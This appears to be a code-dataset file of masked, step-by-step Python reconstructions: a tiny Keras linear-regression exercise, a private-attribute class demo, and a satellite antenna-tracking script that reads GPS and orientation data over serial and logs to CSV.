{ "blob_id": "c8fecb6bfbd39e7a82294c9e0f9e5eaf659b7fed", "index": 1610, "step-1": "<mask token>\n", "step-2": "<mask token>\nmodel.compile(optimizer='sgd', loss='mean_squared_error')\n<mask token>\nmodel.fit(xs, ys, epochs=500)\n<mask token>\nprint(model.predict(dataIn, 1, 1))\n", "step-3": "<mask token>\nmodel = keras.Sequential([keras.layers.Dense(units=1, input_shape=[1])])\nmodel.compile(optimizer='sgd', loss='mean_squared_error')\nxs = np.array([-1.0, 0.0, 1.0, 2.0, 3.0, 4.0], dtype=float)\nys = np.array([-2.0, 1.0, 4.0, 7.0, 10.0, 13.0], dtype=float)\nmodel.fit(xs, ys, epochs=500)\ndataIn = np.array([10.0], dtype=float)\nprint(model.predict(dataIn, 1, 1))\n", "step-4": "import numpy as np\nimport keras\nmodel = keras.Sequential([keras.layers.Dense(units=1, input_shape=[1])])\nmodel.compile(optimizer='sgd', loss='mean_squared_error')\nxs = np.array([-1.0, 0.0, 1.0, 2.0, 3.0, 4.0], dtype=float)\nys = np.array([-2.0, 1.0, 4.0, 7.0, 10.0, 13.0], dtype=float)\nmodel.fit(xs, ys, epochs=500)\ndataIn = np.array([10.0], dtype=float)\nprint(model.predict(dataIn, 1, 1))\n", "step-5": "# Exercise 1 - linear.py\nimport numpy as np\nimport keras\n# Build the model\nmodel = keras.Sequential([keras.layers.Dense(units=1,input_shape=[1])])\n# Set the loss and optimizer function\nmodel.compile(optimizer='sgd', loss='mean_squared_error')\n# Initialize input data\nxs = np.array([-1.0, 0.0, 1.0, 2.0, 3.0, 4.0], dtype=float)\nys = np.array([-2.0, 1.0, 4.0, 7.0, 10.0, 13.0], dtype=float)\n# Fit the model\nmodel.fit(xs, ys, epochs=500)\n# Prediction\ndataIn = np.array([10.0], dtype=float)\nprint(model.predict(dataIn,1,1))", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
class Privacy: <|reserved_special_token_0|> <|reserved_special_token_0|> <|reserved_special_token_1|> class Privacy: def __init__(self, val): self.__val = 900 print('Private data member =', self.__val, '\n') <|reserved_special_token_0|> <|reserved_special_token_1|> class Privacy: def __init__(self, val): self.__val = 900 print('Private data member =', self.__val, '\n') <|reserved_special_token_0|> print('Value not changable\n') value.__val <|reserved_special_token_1|> class Privacy: def __init__(self, val): self.__val = 900 print('Private data member =', self.__val, '\n') value = Privacy(800) print('Value not changable\n') value.__val <|reserved_special_token_1|> # defining private variables class Privacy: def __init__(self, val): self.__val = 900; print("Private data member =",self.__val,"\n") value = Privacy(800); print("Value not changable\n") value.__val;
flexible
{ "blob_id": "b767519229058b50183d78bb97121f050e5b6bad", "index": 423, "step-1": "class Privacy:\n <mask token>\n\n\n<mask token>\n", "step-2": "class Privacy:\n\n def __init__(self, val):\n self.__val = 900\n print('Private data member =', self.__val, '\\n')\n\n\n<mask token>\n", "step-3": "class Privacy:\n\n def __init__(self, val):\n self.__val = 900\n print('Private data member =', self.__val, '\\n')\n\n\n<mask token>\nprint('Value not changable\\n')\nvalue.__val\n", "step-4": "class Privacy:\n\n def __init__(self, val):\n self.__val = 900\n print('Private data member =', self.__val, '\\n')\n\n\nvalue = Privacy(800)\nprint('Value not changable\\n')\nvalue.__val\n", "step-5": "# defining private variables\r\nclass Privacy:\r\n def __init__(self, val):\r\n self.__val = 900; \r\n print(\"Private data member =\",self.__val,\"\\n\")\r\nvalue = Privacy(800);\r\nprint(\"Value not changable\\n\")\r\nvalue.__val;\r\n", "step-ids": [ 1, 2, 3, 4, 5 ] }
[ 1, 2, 3, 4, 5 ]
import time import ephem import serial import nmea import orientation import sys import threading from geomag import geomag #Constants initial_az = 180 initial_alt = 90 min_elevation = 10.0 sleep_time = 1.0 unwind_threshold = 180 sleep_on_unwind = 45.0 last_lon = '-88.787' last_lat = '41.355' last_heading = 0.0 mount_port = '/dev/ttyUSB0' arduino_port = '/dev/ttyACM0' class SerialTester: def write(self,line): print(line) def read(self, num): return class Antenna: azimuth = initial_az altitude = initial_alt parked = True def set_position(self, az, alt): self.azimuth = az self.altitude = alt az_int = round(az) alt_int = round(alt) ser.write(":Sz " + str(az_int) + "*00:00#") ser.write(":Sa +" + str(alt_int) + "*00:00#") ser.write(":MS#") ser.read(64) def park(self): if (self.parked): print('Antenna Parked') else: print('Parking Antenna') self.set_position(initial_az, initial_alt) self.parked = True def move(self, az, alt): if (self.parked): self.parked = False # Unwrap Cable if Azimuth will cross through True North # In the above case, Set Azimuth to 180 Degrees, then pick up # normal tracking # Then sleep 45 seconds to give the positioner time to # reposition if ((self.azimuth - az) > unwind_threshold): self.set_position(initial_az, self.altitude) print('Repositioning to unwrap cable') time.sleep(sleep_on_unwind) else: print('Tracking Mode') self.set_position(az, alt) def reset(): obs = ephem.Observer() #Set LAT/LON Coordinates to IMSA's location obs.date = ephem.now() obs.lon = last_lon obs.lat = last_lat obs.elevation = 0.0 return obs def update_gps(gprmc, obs): obsc = obs.copy() try: if gprmc.is_fixed() and gprmc.checksum(): datetime = gprmc.get_date() + " " + gprmc.get_time() obsc.date = datetime obsc.lat = str(gprmc.get_lat()) last_lat = str(gprmc.get_lat()) obsc.lon = str(gprmc.get_lon()) last_lon = str(gprmc.get_lon()) return obsc except: return obs def setup_serial(port, baud): # Set Serial Port - USB0 ser = serial.Serial(port, baud) print("Port used:" + 
ser.name) return ser # return SerialTester() def setup_satellite(): # Read in TLE for target satellite ICO F2 icof2 = ephem.readtle('ICO F2', '1 26857U 01026A 16172.60175106 -.00000043 00000-0 00000+0 0 9997', '2 26857 044.9783 5.1953 0013193 227.2968 127.4685 03.92441898218058') return icof2 def to_degrees(radians): return radians / ephem.degree def get_sat_position(icof2, home): icof2.compute(home) icof2_az = to_degrees(icof2.az) icof2_alt = to_degrees(icof2.alt) print('Current Satellite Location: Azimuth %3.2f deg, Altitude %3.2f deg' % (icof2_az, icof2_alt)) return icof2_az, icof2_alt def read_message(port): while True: try: line = port.readline().decode("ascii").replace('\r', '').replace('\n', '') except: line = "" if len(line) > 0 and line[0] == "$": return line def nmea_tester(sentence): mes = nmea.nmea(sentence) print("Checksum: ") print(mes.checksum()) print("Reformatted Date & Time: ") print(mes.get_date()) print(mes.get_time()) print("Lat, Lon: ") print(str(mes.get_lat()) + ", " + str(mes.get_lon())) print("Heading, MagVar") print(str(mes.get_magnetic_heading()) + ", " + str(mes.get_magnetic_var())) def arduino_tester(): ard = setup_serial(arduino_port, 115200) icof2 = setup_satellite() while True: try: line = read_nmea(ard) home = reset() home, heading = update(nmea.nmea(line)) print(home.lat) print(home.lon) print(home.date) print(heading) except: break def display_stats(orient, position, obs): try: print("\n"*65) magvar = get_magnetic_var(float(last_lat), float(last_lon)) print(''' _.:::::._ .:::'_|_':::. /::' --|-- '::\\ |:" .---"---. 
':| |: ( O R E O ) :| |:: `-------' ::| \:::.......:::/ ':::::::::::' `'"""'`\n\n''') print("Time: {}\n".format(ephem.now())) print('GPS\n===\nFix: {fix}, Lat: {lat}, Lon: {lon}' .format(fix = position.is_fixed(), lat = obs.lat, lon = obs.lon)) print(position.unparsed) print("Sensor\n===") print('Heading: {heading:7.2f}, Pitch: {pitch:7.2f}, '\ 'Roll: {roll:7.2f}\n---'.format(heading = orient.get_heading(), pitch = orient.get_pitch(), roll = orient.get_roll())) print('CALIBRATION Sys: {cal[0]}, Gyr: {cal[1]},'\ ' Acc: {cal[2]}, Mag: {cal[3]}\n' .format(cal=orient.get_calibration())) print("\nMagnetic Declination: {magvar:7.2f}, " "Adjusted Heading: {true_heading:7.2f}" .format(magvar = magvar, true_heading= (orient.get_heading() + magvar+720)%360)) print('Bearing: {bearing:7.2f}, Speed: {speed:4.2f}' .format(bearing = position.get_bearing(), speed = position.get_speed())) except: pass def get_magnetic_var(lat, lon): gm = geomag.GeoMag() magobj = gm.GeoMag(lat, lon) return magobj.dec home = reset() ard = setup_serial(arduino_port, 115200) counter = time.time() f = open("logs/log_"+str(float(ephem.now()))+".csv", 'w') f.write("Epoch Time,Speed,Sensor,GPS,Waypoint\n") orient = orientation.orientation("$IMU,0,0,0,0,0,0,0,0,0") position = nmea.nmea("$GPRMC,0,V,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0") magvar = get_magnetic_var(float(last_lat), float(last_lon)) class myThread(threading.Thread): def __init__(self): threading.Thread.__init__(self) def run(self): global val global ii val = '@' ii = '' while True: ii = input() if ii == "q": break val = chr(ord(val) + 1) pass thread1 = myThread() thread1.start() while True: mes = (read_message(ard)) if mes[:2] == "$G": try: position = nmea.nmea(mes) except: pass elif mes[:2] == "$I": try: orient = orientation.orientation(mes) except: pass # home.date = "2016-06-28 12:00:00" # Operate the antenna if the satellite's elevation is greater than 10 # degrees # If the elevation IS above 10 degrees and the antenna is parked, then # unlatch the 
park_latch variable home = update_gps(position, home) home.date = ephem.now() magvar = get_magnetic_var(float(last_lat), float(last_lon)) display_stats(orient, position, home) print(val) if time.time() - counter >= 1.0: counter = time.time() try: f.write(str(ephem.now())+",") f.write(str(position.get_speed())+",") f.write(str(orient.get_heading())+",") f.write(str(position.get_bearing())+",") f.write(val+"\n") except: f.write("x\n") if ii == "q": f.close() break ''' icof2_az, icof2_alt = get_sat_position(icof2, home) if (icof2_alt >= min_elevation): antenna.set_position(icof2_az - heading, icof2_alt) else: antenna.park()'''
normal
{ "blob_id": "468b5bd8d7b045ca8dd46c76a1829fc499e16950", "index": 5756, "step-1": "<mask token>\n\n\nclass SerialTester:\n\n def write(self, line):\n print(line)\n\n def read(self, num):\n return\n\n\nclass Antenna:\n azimuth = initial_az\n altitude = initial_alt\n parked = True\n\n def set_position(self, az, alt):\n self.azimuth = az\n self.altitude = alt\n az_int = round(az)\n alt_int = round(alt)\n ser.write(':Sz ' + str(az_int) + '*00:00#')\n ser.write(':Sa +' + str(alt_int) + '*00:00#')\n ser.write(':MS#')\n ser.read(64)\n\n def park(self):\n if self.parked:\n print('Antenna Parked')\n else:\n print('Parking Antenna')\n self.set_position(initial_az, initial_alt)\n self.parked = True\n\n def move(self, az, alt):\n if self.parked:\n self.parked = False\n if self.azimuth - az > unwind_threshold:\n self.set_position(initial_az, self.altitude)\n print('Repositioning to unwrap cable')\n time.sleep(sleep_on_unwind)\n else:\n print('Tracking Mode')\n self.set_position(az, alt)\n\n\n<mask token>\n\n\ndef setup_serial(port, baud):\n ser = serial.Serial(port, baud)\n print('Port used:' + ser.name)\n return ser\n\n\n<mask token>\n\n\ndef read_message(port):\n while True:\n try:\n line = port.readline().decode('ascii').replace('\\r', '').replace(\n '\\n', '')\n except:\n line = ''\n if len(line) > 0 and line[0] == '$':\n return line\n\n\n<mask token>\n\n\ndef display_stats(orient, position, obs):\n try:\n print('\\n' * 65)\n magvar = get_magnetic_var(float(last_lat), float(last_lon))\n print(\n \"\"\" _.:::::._\n .:::'_|_':::.\n /::' --|-- '::\\\\\n |:\" .---\"---. 
':|\n |: ( O R E O ) :|\n |:: `-------' ::|\n \\\\:::.......:::/\n ':::::::::::'\n `'\"\"\\\"'`\n\n\"\"\"\n )\n print('Time: {}\\n'.format(ephem.now()))\n print('GPS\\n===\\nFix: {fix}, Lat: {lat}, Lon: {lon}'.format(fix=\n position.is_fixed(), lat=obs.lat, lon=obs.lon))\n print(position.unparsed)\n print('Sensor\\n===')\n print(\n 'Heading: {heading:7.2f}, Pitch: {pitch:7.2f}, Roll: {roll:7.2f}\\n---'\n .format(heading=orient.get_heading(), pitch=orient.get_pitch(),\n roll=orient.get_roll()))\n print(\n 'CALIBRATION Sys: {cal[0]}, Gyr: {cal[1]}, Acc: {cal[2]}, Mag: {cal[3]}\\n'\n .format(cal=orient.get_calibration()))\n print(\n '\\nMagnetic Declination: {magvar:7.2f}, Adjusted Heading: {true_heading:7.2f}'\n .format(magvar=magvar, true_heading=(orient.get_heading() +\n magvar + 720) % 360))\n print('Bearing: {bearing:7.2f}, Speed: {speed:4.2f}'.format(bearing\n =position.get_bearing(), speed=position.get_speed()))\n except:\n pass\n\n\ndef get_magnetic_var(lat, lon):\n gm = geomag.GeoMag()\n magobj = gm.GeoMag(lat, lon)\n return magobj.dec\n\n\n<mask token>\n\n\nclass myThread(threading.Thread):\n\n def __init__(self):\n threading.Thread.__init__(self)\n\n def run(self):\n global val\n global ii\n val = '@'\n ii = ''\n while True:\n ii = input()\n if ii == 'q':\n break\n val = chr(ord(val) + 1)\n pass\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\nclass SerialTester:\n\n def write(self, line):\n print(line)\n\n def read(self, num):\n return\n\n\nclass Antenna:\n azimuth = initial_az\n altitude = initial_alt\n parked = True\n\n def set_position(self, az, alt):\n self.azimuth = az\n self.altitude = alt\n az_int = round(az)\n alt_int = round(alt)\n ser.write(':Sz ' + str(az_int) + '*00:00#')\n ser.write(':Sa +' + str(alt_int) + '*00:00#')\n ser.write(':MS#')\n ser.read(64)\n\n def park(self):\n if self.parked:\n print('Antenna Parked')\n else:\n print('Parking Antenna')\n self.set_position(initial_az, initial_alt)\n self.parked = True\n\n def move(self, az, 
alt):\n if self.parked:\n self.parked = False\n if self.azimuth - az > unwind_threshold:\n self.set_position(initial_az, self.altitude)\n print('Repositioning to unwrap cable')\n time.sleep(sleep_on_unwind)\n else:\n print('Tracking Mode')\n self.set_position(az, alt)\n\n\n<mask token>\n\n\ndef setup_serial(port, baud):\n ser = serial.Serial(port, baud)\n print('Port used:' + ser.name)\n return ser\n\n\ndef setup_satellite():\n icof2 = ephem.readtle('ICO F2',\n '1 26857U 01026A 16172.60175106 -.00000043 00000-0 00000+0 0 9997'\n ,\n '2 26857 044.9783 5.1953 0013193 227.2968 127.4685 03.92441898218058'\n )\n return icof2\n\n\ndef to_degrees(radians):\n return radians / ephem.degree\n\n\n<mask token>\n\n\ndef read_message(port):\n while True:\n try:\n line = port.readline().decode('ascii').replace('\\r', '').replace(\n '\\n', '')\n except:\n line = ''\n if len(line) > 0 and line[0] == '$':\n return line\n\n\n<mask token>\n\n\ndef arduino_tester():\n ard = setup_serial(arduino_port, 115200)\n icof2 = setup_satellite()\n while True:\n try:\n line = read_nmea(ard)\n home = reset()\n home, heading = update(nmea.nmea(line))\n print(home.lat)\n print(home.lon)\n print(home.date)\n print(heading)\n except:\n break\n\n\ndef display_stats(orient, position, obs):\n try:\n print('\\n' * 65)\n magvar = get_magnetic_var(float(last_lat), float(last_lon))\n print(\n \"\"\" _.:::::._\n .:::'_|_':::.\n /::' --|-- '::\\\\\n |:\" .---\"---. 
':|\n |: ( O R E O ) :|\n |:: `-------' ::|\n \\\\:::.......:::/\n ':::::::::::'\n `'\"\"\\\"'`\n\n\"\"\"\n )\n print('Time: {}\\n'.format(ephem.now()))\n print('GPS\\n===\\nFix: {fix}, Lat: {lat}, Lon: {lon}'.format(fix=\n position.is_fixed(), lat=obs.lat, lon=obs.lon))\n print(position.unparsed)\n print('Sensor\\n===')\n print(\n 'Heading: {heading:7.2f}, Pitch: {pitch:7.2f}, Roll: {roll:7.2f}\\n---'\n .format(heading=orient.get_heading(), pitch=orient.get_pitch(),\n roll=orient.get_roll()))\n print(\n 'CALIBRATION Sys: {cal[0]}, Gyr: {cal[1]}, Acc: {cal[2]}, Mag: {cal[3]}\\n'\n .format(cal=orient.get_calibration()))\n print(\n '\\nMagnetic Declination: {magvar:7.2f}, Adjusted Heading: {true_heading:7.2f}'\n .format(magvar=magvar, true_heading=(orient.get_heading() +\n magvar + 720) % 360))\n print('Bearing: {bearing:7.2f}, Speed: {speed:4.2f}'.format(bearing\n =position.get_bearing(), speed=position.get_speed()))\n except:\n pass\n\n\ndef get_magnetic_var(lat, lon):\n gm = geomag.GeoMag()\n magobj = gm.GeoMag(lat, lon)\n return magobj.dec\n\n\n<mask token>\n\n\nclass myThread(threading.Thread):\n\n def __init__(self):\n threading.Thread.__init__(self)\n\n def run(self):\n global val\n global ii\n val = '@'\n ii = ''\n while True:\n ii = input()\n if ii == 'q':\n break\n val = chr(ord(val) + 1)\n pass\n\n\n<mask token>\n", "step-3": "<mask token>\n\n\nclass SerialTester:\n\n def write(self, line):\n print(line)\n\n def read(self, num):\n return\n\n\nclass Antenna:\n azimuth = initial_az\n altitude = initial_alt\n parked = True\n\n def set_position(self, az, alt):\n self.azimuth = az\n self.altitude = alt\n az_int = round(az)\n alt_int = round(alt)\n ser.write(':Sz ' + str(az_int) + '*00:00#')\n ser.write(':Sa +' + str(alt_int) + '*00:00#')\n ser.write(':MS#')\n ser.read(64)\n\n def park(self):\n if self.parked:\n print('Antenna Parked')\n else:\n print('Parking Antenna')\n self.set_position(initial_az, initial_alt)\n self.parked = True\n\n def move(self, az, 
alt):\n if self.parked:\n self.parked = False\n if self.azimuth - az > unwind_threshold:\n self.set_position(initial_az, self.altitude)\n print('Repositioning to unwrap cable')\n time.sleep(sleep_on_unwind)\n else:\n print('Tracking Mode')\n self.set_position(az, alt)\n\n\n<mask token>\n\n\ndef update_gps(gprmc, obs):\n obsc = obs.copy()\n try:\n if gprmc.is_fixed() and gprmc.checksum():\n datetime = gprmc.get_date() + ' ' + gprmc.get_time()\n obsc.date = datetime\n obsc.lat = str(gprmc.get_lat())\n last_lat = str(gprmc.get_lat())\n obsc.lon = str(gprmc.get_lon())\n last_lon = str(gprmc.get_lon())\n return obsc\n except:\n return obs\n\n\ndef setup_serial(port, baud):\n ser = serial.Serial(port, baud)\n print('Port used:' + ser.name)\n return ser\n\n\ndef setup_satellite():\n icof2 = ephem.readtle('ICO F2',\n '1 26857U 01026A 16172.60175106 -.00000043 00000-0 00000+0 0 9997'\n ,\n '2 26857 044.9783 5.1953 0013193 227.2968 127.4685 03.92441898218058'\n )\n return icof2\n\n\ndef to_degrees(radians):\n return radians / ephem.degree\n\n\ndef get_sat_position(icof2, home):\n icof2.compute(home)\n icof2_az = to_degrees(icof2.az)\n icof2_alt = to_degrees(icof2.alt)\n print(\n 'Current Satellite Location: Azimuth %3.2f deg, Altitude %3.2f deg' %\n (icof2_az, icof2_alt))\n return icof2_az, icof2_alt\n\n\ndef read_message(port):\n while True:\n try:\n line = port.readline().decode('ascii').replace('\\r', '').replace(\n '\\n', '')\n except:\n line = ''\n if len(line) > 0 and line[0] == '$':\n return line\n\n\ndef nmea_tester(sentence):\n mes = nmea.nmea(sentence)\n print('Checksum: ')\n print(mes.checksum())\n print('Reformatted Date & Time: ')\n print(mes.get_date())\n print(mes.get_time())\n print('Lat, Lon: ')\n print(str(mes.get_lat()) + ', ' + str(mes.get_lon()))\n print('Heading, MagVar')\n print(str(mes.get_magnetic_heading()) + ', ' + str(mes.get_magnetic_var()))\n\n\ndef arduino_tester():\n ard = setup_serial(arduino_port, 115200)\n icof2 = setup_satellite()\n while 
True:\n try:\n line = read_nmea(ard)\n home = reset()\n home, heading = update(nmea.nmea(line))\n print(home.lat)\n print(home.lon)\n print(home.date)\n print(heading)\n except:\n break\n\n\ndef display_stats(orient, position, obs):\n try:\n print('\\n' * 65)\n magvar = get_magnetic_var(float(last_lat), float(last_lon))\n print(\n \"\"\" _.:::::._\n .:::'_|_':::.\n /::' --|-- '::\\\\\n |:\" .---\"---. ':|\n |: ( O R E O ) :|\n |:: `-------' ::|\n \\\\:::.......:::/\n ':::::::::::'\n `'\"\"\\\"'`\n\n\"\"\"\n )\n print('Time: {}\\n'.format(ephem.now()))\n print('GPS\\n===\\nFix: {fix}, Lat: {lat}, Lon: {lon}'.format(fix=\n position.is_fixed(), lat=obs.lat, lon=obs.lon))\n print(position.unparsed)\n print('Sensor\\n===')\n print(\n 'Heading: {heading:7.2f}, Pitch: {pitch:7.2f}, Roll: {roll:7.2f}\\n---'\n .format(heading=orient.get_heading(), pitch=orient.get_pitch(),\n roll=orient.get_roll()))\n print(\n 'CALIBRATION Sys: {cal[0]}, Gyr: {cal[1]}, Acc: {cal[2]}, Mag: {cal[3]}\\n'\n .format(cal=orient.get_calibration()))\n print(\n '\\nMagnetic Declination: {magvar:7.2f}, Adjusted Heading: {true_heading:7.2f}'\n .format(magvar=magvar, true_heading=(orient.get_heading() +\n magvar + 720) % 360))\n print('Bearing: {bearing:7.2f}, Speed: {speed:4.2f}'.format(bearing\n =position.get_bearing(), speed=position.get_speed()))\n except:\n pass\n\n\ndef get_magnetic_var(lat, lon):\n gm = geomag.GeoMag()\n magobj = gm.GeoMag(lat, lon)\n return magobj.dec\n\n\n<mask token>\n\n\nclass myThread(threading.Thread):\n\n def __init__(self):\n threading.Thread.__init__(self)\n\n def run(self):\n global val\n global ii\n val = '@'\n ii = ''\n while True:\n ii = input()\n if ii == 'q':\n break\n val = chr(ord(val) + 1)\n pass\n\n\n<mask token>\n", "step-4": "import time\nimport ephem\nimport serial\nimport nmea\nimport orientation\nimport sys\nimport threading\nfrom geomag import geomag\ninitial_az = 180\ninitial_alt = 90\nmin_elevation = 10.0\nsleep_time = 1.0\nunwind_threshold = 
180\nsleep_on_unwind = 45.0\nlast_lon = '-88.787'\nlast_lat = '41.355'\nlast_heading = 0.0\nmount_port = '/dev/ttyUSB0'\narduino_port = '/dev/ttyACM0'\n\n\nclass SerialTester:\n\n def write(self, line):\n print(line)\n\n def read(self, num):\n return\n\n\nclass Antenna:\n azimuth = initial_az\n altitude = initial_alt\n parked = True\n\n def set_position(self, az, alt):\n self.azimuth = az\n self.altitude = alt\n az_int = round(az)\n alt_int = round(alt)\n ser.write(':Sz ' + str(az_int) + '*00:00#')\n ser.write(':Sa +' + str(alt_int) + '*00:00#')\n ser.write(':MS#')\n ser.read(64)\n\n def park(self):\n if self.parked:\n print('Antenna Parked')\n else:\n print('Parking Antenna')\n self.set_position(initial_az, initial_alt)\n self.parked = True\n\n def move(self, az, alt):\n if self.parked:\n self.parked = False\n if self.azimuth - az > unwind_threshold:\n self.set_position(initial_az, self.altitude)\n print('Repositioning to unwrap cable')\n time.sleep(sleep_on_unwind)\n else:\n print('Tracking Mode')\n self.set_position(az, alt)\n\n\ndef reset():\n obs = ephem.Observer()\n obs.date = ephem.now()\n obs.lon = last_lon\n obs.lat = last_lat\n obs.elevation = 0.0\n return obs\n\n\ndef update_gps(gprmc, obs):\n obsc = obs.copy()\n try:\n if gprmc.is_fixed() and gprmc.checksum():\n datetime = gprmc.get_date() + ' ' + gprmc.get_time()\n obsc.date = datetime\n obsc.lat = str(gprmc.get_lat())\n last_lat = str(gprmc.get_lat())\n obsc.lon = str(gprmc.get_lon())\n last_lon = str(gprmc.get_lon())\n return obsc\n except:\n return obs\n\n\ndef setup_serial(port, baud):\n ser = serial.Serial(port, baud)\n print('Port used:' + ser.name)\n return ser\n\n\ndef setup_satellite():\n icof2 = ephem.readtle('ICO F2',\n '1 26857U 01026A 16172.60175106 -.00000043 00000-0 00000+0 0 9997'\n ,\n '2 26857 044.9783 5.1953 0013193 227.2968 127.4685 03.92441898218058'\n )\n return icof2\n\n\ndef to_degrees(radians):\n return radians / ephem.degree\n\n\ndef get_sat_position(icof2, home):\n 
icof2.compute(home)\n icof2_az = to_degrees(icof2.az)\n icof2_alt = to_degrees(icof2.alt)\n print(\n 'Current Satellite Location: Azimuth %3.2f deg, Altitude %3.2f deg' %\n (icof2_az, icof2_alt))\n return icof2_az, icof2_alt\n\n\ndef read_message(port):\n while True:\n try:\n line = port.readline().decode('ascii').replace('\\r', '').replace(\n '\\n', '')\n except:\n line = ''\n if len(line) > 0 and line[0] == '$':\n return line\n\n\ndef nmea_tester(sentence):\n mes = nmea.nmea(sentence)\n print('Checksum: ')\n print(mes.checksum())\n print('Reformatted Date & Time: ')\n print(mes.get_date())\n print(mes.get_time())\n print('Lat, Lon: ')\n print(str(mes.get_lat()) + ', ' + str(mes.get_lon()))\n print('Heading, MagVar')\n print(str(mes.get_magnetic_heading()) + ', ' + str(mes.get_magnetic_var()))\n\n\ndef arduino_tester():\n ard = setup_serial(arduino_port, 115200)\n icof2 = setup_satellite()\n while True:\n try:\n line = read_nmea(ard)\n home = reset()\n home, heading = update(nmea.nmea(line))\n print(home.lat)\n print(home.lon)\n print(home.date)\n print(heading)\n except:\n break\n\n\ndef display_stats(orient, position, obs):\n try:\n print('\\n' * 65)\n magvar = get_magnetic_var(float(last_lat), float(last_lon))\n print(\n \"\"\" _.:::::._\n .:::'_|_':::.\n /::' --|-- '::\\\\\n |:\" .---\"---. 
':|\n |: ( O R E O ) :|\n |:: `-------' ::|\n \\\\:::.......:::/\n ':::::::::::'\n `'\"\"\\\"'`\n\n\"\"\"\n )\n print('Time: {}\\n'.format(ephem.now()))\n print('GPS\\n===\\nFix: {fix}, Lat: {lat}, Lon: {lon}'.format(fix=\n position.is_fixed(), lat=obs.lat, lon=obs.lon))\n print(position.unparsed)\n print('Sensor\\n===')\n print(\n 'Heading: {heading:7.2f}, Pitch: {pitch:7.2f}, Roll: {roll:7.2f}\\n---'\n .format(heading=orient.get_heading(), pitch=orient.get_pitch(),\n roll=orient.get_roll()))\n print(\n 'CALIBRATION Sys: {cal[0]}, Gyr: {cal[1]}, Acc: {cal[2]}, Mag: {cal[3]}\\n'\n .format(cal=orient.get_calibration()))\n print(\n '\\nMagnetic Declination: {magvar:7.2f}, Adjusted Heading: {true_heading:7.2f}'\n .format(magvar=magvar, true_heading=(orient.get_heading() +\n magvar + 720) % 360))\n print('Bearing: {bearing:7.2f}, Speed: {speed:4.2f}'.format(bearing\n =position.get_bearing(), speed=position.get_speed()))\n except:\n pass\n\n\ndef get_magnetic_var(lat, lon):\n gm = geomag.GeoMag()\n magobj = gm.GeoMag(lat, lon)\n return magobj.dec\n\n\nhome = reset()\nard = setup_serial(arduino_port, 115200)\ncounter = time.time()\nf = open('logs/log_' + str(float(ephem.now())) + '.csv', 'w')\nf.write('Epoch Time,Speed,Sensor,GPS,Waypoint\\n')\norient = orientation.orientation('$IMU,0,0,0,0,0,0,0,0,0')\nposition = nmea.nmea('$GPRMC,0,V,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0')\nmagvar = get_magnetic_var(float(last_lat), float(last_lon))\n\n\nclass myThread(threading.Thread):\n\n def __init__(self):\n threading.Thread.__init__(self)\n\n def run(self):\n global val\n global ii\n val = '@'\n ii = ''\n while True:\n ii = input()\n if ii == 'q':\n break\n val = chr(ord(val) + 1)\n pass\n\n\nthread1 = myThread()\nthread1.start()\nwhile True:\n mes = read_message(ard)\n if mes[:2] == '$G':\n try:\n position = nmea.nmea(mes)\n except:\n pass\n elif mes[:2] == '$I':\n try:\n orient = orientation.orientation(mes)\n except:\n pass\n home = update_gps(position, home)\n home.date = 
ephem.now()\n magvar = get_magnetic_var(float(last_lat), float(last_lon))\n display_stats(orient, position, home)\n print(val)\n if time.time() - counter >= 1.0:\n counter = time.time()\n try:\n f.write(str(ephem.now()) + ',')\n f.write(str(position.get_speed()) + ',')\n f.write(str(orient.get_heading()) + ',')\n f.write(str(position.get_bearing()) + ',')\n f.write(val + '\\n')\n except:\n f.write('x\\n')\n if ii == 'q':\n f.close()\n break\n<mask token>\n", "step-5": "import time\nimport ephem\nimport serial\nimport nmea\nimport orientation\nimport sys\nimport threading\nfrom geomag import geomag\n\n#Constants\ninitial_az = 180\ninitial_alt = 90\nmin_elevation = 10.0\nsleep_time = 1.0\nunwind_threshold = 180\nsleep_on_unwind = 45.0\n\nlast_lon = '-88.787'\nlast_lat = '41.355'\nlast_heading = 0.0\n\nmount_port = '/dev/ttyUSB0'\narduino_port = '/dev/ttyACM0'\n\nclass SerialTester:\n def write(self,line):\n print(line)\n\n def read(self, num):\n return\n\nclass Antenna:\n azimuth = initial_az\n altitude = initial_alt\n parked = True\n\n def set_position(self, az, alt):\n self.azimuth = az\n self.altitude = alt\n az_int = round(az)\n alt_int = round(alt)\n ser.write(\":Sz \" + str(az_int) + \"*00:00#\")\n ser.write(\":Sa +\" + str(alt_int) + \"*00:00#\")\n ser.write(\":MS#\")\n ser.read(64)\n\n def park(self):\n if (self.parked):\n print('Antenna Parked')\n else:\n print('Parking Antenna')\n self.set_position(initial_az, initial_alt)\n self.parked = True\n\n def move(self, az, alt):\n if (self.parked):\n self.parked = False\n # Unwrap Cable if Azimuth will cross through True North\n # In the above case, Set Azimuth to 180 Degrees, then pick up\n # normal tracking\n # Then sleep 45 seconds to give the positioner time to\n # reposition\n if ((self.azimuth - az) > unwind_threshold):\n self.set_position(initial_az, self.altitude)\n print('Repositioning to unwrap cable')\n time.sleep(sleep_on_unwind)\n else:\n print('Tracking Mode')\n self.set_position(az, alt)\n\ndef 
reset():\n obs = ephem.Observer()\n #Set LAT/LON Coordinates to IMSA's location\n obs.date = ephem.now()\n obs.lon = last_lon\n obs.lat = last_lat\n obs.elevation = 0.0\n return obs\n\ndef update_gps(gprmc, obs):\n obsc = obs.copy()\n try:\n if gprmc.is_fixed() and gprmc.checksum():\n datetime = gprmc.get_date() + \" \" + gprmc.get_time()\n obsc.date = datetime\n obsc.lat = str(gprmc.get_lat())\n last_lat = str(gprmc.get_lat())\n obsc.lon = str(gprmc.get_lon())\n last_lon = str(gprmc.get_lon())\n return obsc\n except:\n return obs\n\n\ndef setup_serial(port, baud):\n # Set Serial Port - USB0\n ser = serial.Serial(port, baud)\n print(\"Port used:\" + ser.name)\n return ser\n# return SerialTester()\n\ndef setup_satellite():\n # Read in TLE for target satellite ICO F2\n icof2 = ephem.readtle('ICO F2',\n '1 26857U 01026A 16172.60175106 -.00000043 00000-0 00000+0 0 9997',\n '2 26857 044.9783 5.1953 0013193 227.2968 127.4685 03.92441898218058')\n return icof2\n\ndef to_degrees(radians):\n return radians / ephem.degree\n\ndef get_sat_position(icof2, home):\n icof2.compute(home)\n icof2_az = to_degrees(icof2.az)\n icof2_alt = to_degrees(icof2.alt)\n print('Current Satellite Location: Azimuth %3.2f deg, Altitude %3.2f deg' % (icof2_az, icof2_alt))\n return 